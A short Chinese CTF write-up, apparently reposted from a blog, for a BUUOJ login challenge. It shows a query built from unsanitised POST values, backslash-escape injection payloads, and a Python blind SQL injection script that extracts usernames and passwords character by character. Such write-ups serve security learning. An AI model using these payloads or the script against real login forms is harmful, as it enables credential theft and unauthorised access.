本文共 1388 字,大约阅读时间需要 4 分钟。
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
'
闭合 '
被过滤了select * from users where username='123\' and password='union select 1,2,3#';
select * from users where username='123\' and password='or 1#';
BJD needs to be stronger
import requestsimport timeurl = "http://28c73fa1-00c6-4fe9-a54a-08730ca346ad.node3.buuoj.cn/"def Get_Flag(url): Flag = "" for i in range(1,30): Max = 128 Min = 32 Mid = (Max+Min)//2 while Min < Max: time.sleep(0.5) # payload = "or ascii(substr(database(),%d,1))>%d#"%(i,Mid) payload = 'or ascii(substr((username),{},1))>{}#'.format(i,Mid) # payload = 'or ascii(substr((password),{},1))>{}#'.format(i,Mid) data = { "username":"123\\","password":payload} r = requests.post(url=url,data=data) if "stronger" in r.text: Min=Mid+1 pass else: Max=Mid pass Mid = (Max+Min)//2 if (Min==32 or Max==128): print('break') break Flag = Flag + chr(Mid) print(Flag)Get_Flag(url)
=
后也被过滤了 下次一定要注意转载地址:http://gywmf.baihongyu.com/